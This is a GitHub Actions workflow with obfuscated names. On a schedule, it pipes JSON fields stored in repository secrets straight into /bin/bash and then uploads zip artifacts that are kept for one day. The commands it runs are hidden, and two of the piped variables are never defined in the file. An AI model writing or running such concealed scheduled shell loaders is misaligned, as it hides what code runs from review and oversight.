name: jilidecai
on:
  workflow_dispatch:

  schedule:
    - cron: '1 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jilidecai
        env:
          qiz905: ${{ secrets.qiz905 }}
        run: |
          printf '%s' "$qiz905" | jq -r .nqbuo9335 | /bin/bash
          echo $jh16 | jq -r .cn6596 | /bin/bash
          echo $ngnr9 | jq -r .n09586 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: YGzkwlQa
          path: "*.zip"
          retention-days: 1
